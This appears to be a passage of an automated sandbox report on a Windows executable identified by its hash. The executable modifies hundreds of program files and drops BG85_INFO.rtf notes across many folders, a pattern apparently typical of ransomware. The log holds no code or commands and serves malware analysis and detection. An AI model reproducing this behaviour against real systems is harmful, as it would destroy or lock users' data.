c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\America\Argentina\Salta c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\VideoLAN\VLC\lua\http\images\Audio-48.png c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File created C:\Program Files\VideoLAN\VLC\locale\ne\LC_MESSAGES\BG85_INFO.rtf c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files (x86)\Adobe\Reader 9.0\Setup Files\{AC76BA86-7AD7-1033-7B44-A90000000001}\Setup.exe c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\America\Antigua c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\ct.sym c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\Asia\Thimphu c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File created C:\Program Files\VideoLAN\VLC\lua\meta\art\BG85_INFO.rtf c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\Etc\GMT+11 c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\locale\org-netbeans-core-windows_ja.jar c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\visualvm\modules\com-sun-tools-visualvm-jvm.jar c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\Java\jre7\lib\fonts\LucidaTypewriterBold.ttf c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\Indian\Cocos c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\VideoLAN\VLC\lua\http\images\speaker-32.png c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files (x86)\Microsoft Analysis Services\AS OLEDB\10\Cartridges\msjet.xsl c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\v3.5\Workflow.VisualBasic.Targets c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Asia\Tbilisi c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\America\Araguaina c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.equinox.p2.touchpoint.eclipse.nl_ja_4.4.0.v20140623020002.jar c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\locale\org-openide-execution_zh_CN.jar c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\Asia\Sakhalin c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\America\Argentina\Ushuaia c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files (x86)\Adobe\Reader 9.0\Reader\AdobeCollabSync.exe c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files (x86)\Google\Chrome\Application\84.0.4147.89\chrome_100_percent.pak c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Asia\Ust-Nera c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\America\Argentina\Salta c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File created C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.console.ui.notification_5.5.0.165303\BG85_INFO.rtf c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\Mozilla Firefox\fonts\TwemojiMozilla.ttf c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\SystemV\YST9YDT c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.equinox.p2.director.app.nl_zh_4.4.0.v20140623020002.jar c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\lib\locale\org-openide-modules_ja.jar c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\org-openide-explorer.jar c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\visualvm\modules\com-sun-tools-visualvm-host-views.jar c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files (x86)\Google\Chrome\Application\84.0.4147.89\Locales\nb.pak c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Pacific\Nauru c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.ecf.filetransfer.httpclient4.feature_3.9.1.v20140827-1444\about.html c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.jface_3.10.1.v20140813-1009.jar c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\VideoLAN\VLC\locale\ru\LC_MESSAGES\vlc.mo c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File created C:\Program Files\VideoLAN\VLC\lua\http\css\BG85_INFO.rtf c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Europe\Madrid c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\locale\org-netbeans-core_ja.jar c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\locale\org-netbeans-modules-settings_zh_CN.jar c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\Java\jre7\lib\deploy\messages_es.properties c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\Asia\Novokuznetsk c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\SendRequest.png c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\classlist c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\America\Pangnirtung c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.equinox.security.win32.x86_64_1.0.100.v20130327-1442.jar c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\Java\jre7\bin\javaws.exe c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\locale\org-netbeans-lib-uihandler_ja.jar c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\org-netbeans-modules-uihandler.jar c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\visualvm\modules\locale\com-sun-tools-visualvm-profiler_zh_CN.jar c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\Pacific\Chuuk c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\Providers\Proximity\11.00\engphon.env c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\bin\javac.exe c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\fonts\LucidaTypewriterRegular.ttf c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\SystemV\MST7MDT c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\locale\org-netbeans-swing-plaf_zh_CN.jar c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\Java\jre7\lib\meta-index c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\Asia\Yerevan c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\Europe\Volgograd c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\Pacific\Guadalcanal c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\America\Nome c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Etc\GMT-1 c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.e4.ui.workbench.addons.swt_1.1.1.v20140903-0821.jar c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\Pacific\Wake c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files (x86)\Google\Chrome\Application\84.0.4147.89\Installer\chrmstp.exe c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files (x86)\Google\Chrome\Application\chrome_proxy.exe c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\UninstallApprove.vssm c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Font\MinionPro-Regular.otf c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.equinox.p2.operations.nl_ja_4.4.0.v20140623020002.jar c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\VERSION.txt c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\Pacific\Galapagos c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\Asia\Almaty c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\VideoLAN\VLC\locale\ps\LC_MESSAGES\vlc.mo c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.ui.themes_1.0.1.v20140819-1717\css\e4_default_winxp_blu.css c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.swt.nl_zh_4.4.0.v20140623020002.jar c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\org-netbeans-modules-options-keymap.jar c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\org-netbeans-modules-editor-mimelookup.jar c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\VideoLAN\VLC\locale\ks_IN\LC_MESSAGES\vlc.mo c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\cmm\CIEXYZ.pf c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Europe\Sofia c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Atlantic\Cape_Verde c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\VideoLAN\VLC\lua\http\images\Folder-48.png c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\Windows Mail\en-US\msoeres.dll.mui c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.ecf.filetransfer.httpclient4.ssl.feature_1.0.0.v20140827-1444\epl-v10.html c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.ecf.filetransfer.httpclient4.ssl.feature_1.0.0.v20140827-1444\about.html c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\locale\org-netbeans-api-progress_ja.jar c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\p2\org.eclipse.equinox.p2.engine\.settings\org.eclipse.equinox.p2.metadata.repository.prefs c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\release c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\Etc\GMT-14 c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\VideoLAN\VLC\locale\sr\LC_MESSAGES\vlc.mo c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File created C:\Program Files\Mozilla Firefox\gmp-clearkey\0.1\BG85_INFO.rtf c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files (x86)\Microsoft Visual Studio 8\Common7\IDE\VSTA\ItemTemplates\VisualBasic\1033\Module.zip c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\deploy\messages_sv.properties c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.emf.ecore_2.10.1.v20140901-1043\epl-v10.html c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Font\MinionPro-BoldIt.otf c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\profiler\modules\locale\org-netbeans-modules-profiler-heapwalker_ja.jar c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\Pacific\Port_Moresby c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\Providers\Proximity\11.00\eng.hyp c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Font\AdobePiStd.otf c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\deploy\splash.gif c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.ui.themes_1.0.1.v20140819-1717\css\e4_basestyle.css c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\locale\org-netbeans-api-visual_zh_CN.jar c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\LanguageNames2\DisplayLanguageNames.en_GB_EURO.txt c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\America\Godthab c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\America\Resolute c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File created C:\Program Files\VideoLAN\VLC\locale\ga\LC_MESSAGES\BG85_INFO.rtf c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\visualvm\modules\locale\com-sun-tools-visualvm-modules-appui_zh_CN.jar c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\CST6CDT c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\VideoLAN\VLC\locale\km\LC_MESSAGES\vlc.mo c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.core.databinding.nl_ja_4.4.0.v20140623020002.jar c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.equinox.launcher.win32.win32.x86_64.nl_zh_4.4.0.v20140623020002.jar c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.e4.ui.css.swt.nl_ja_4.4.0.v20140623020002.jar c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\America\Indiana\Tell_City c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\orb.idl c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\profiler\lib\locale\jfluid-server_zh_CN.jar c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\profiler\modules\locale\org-netbeans-lib-profiler-common_ja.jar c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\VideoLAN\VLC\vlc-cache-gen.exe c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File created C:\Program Files\VideoLAN\VLC\plugins\BG85_INFO.rtf c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Europe\Rome c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Pacific\Port_Moresby c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\locale\org-netbeans-spi-quicksearch_ja.jar c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.equinox.p2.rcp.feature_1.2.0.v20140523-0116\META-INF\ECLIPSE_.SF c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.equinox.security_1.2.0.v20130424-1801.jar c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\visualvm\modules\locale\com-sun-tools-visualvm-api-caching_ja.jar c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\visualvm\modules\locale\com-sun-tools-visualvm-attach_zh_CN.jar c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File created C:\Program Files\VideoLAN\VLC\locale\it\LC_MESSAGES\BG85_INFO.rtf c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\management\jmxremote.password.template c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.ecf.filetransfer.httpclient4.feature_3.9.1.v20140827-1444\META-INF\ECLIPSE_.SF c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.ecf.filetransfer.ssl.feature_1.0.0.v20140827-1444\META-INF\eclipse.inf c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.equinox.p2.garbagecollector.nl_zh_4.4.0.v20140623020002.jar c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\org-openide-text.jar c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\Java\jre7\lib\security\US_export_policy.jar c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\VideoLAN\VLC\lua\playlist\vimeo.luac c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\VideoLAN\VLC\lua\http\images\Video-48.png c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\bin\javaw.exe c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Etc\GMT-4 c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.emf.common_2.10.1.v20140901-1043\META-INF\MANIFEST.MF c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File created C:\Program Files\VideoLAN\VLC\lua\intf\BG85_INFO.rtf c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File created C:\Program Files (x86)\Google\Chrome\Application\84.0.4147.89\WidevineCdm\_platform_specific\win_x64\BG85_INFO.rtf c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.p2.ui.overridden_5.5.0.165303.jar c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File created C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\ext\BG85_INFO.rtf c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\Mozilla Firefox\updater.exe c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files (x86)\Google\Chrome\Application\84.0.4147.89\chrome.dll.sig c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\currency.data c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program 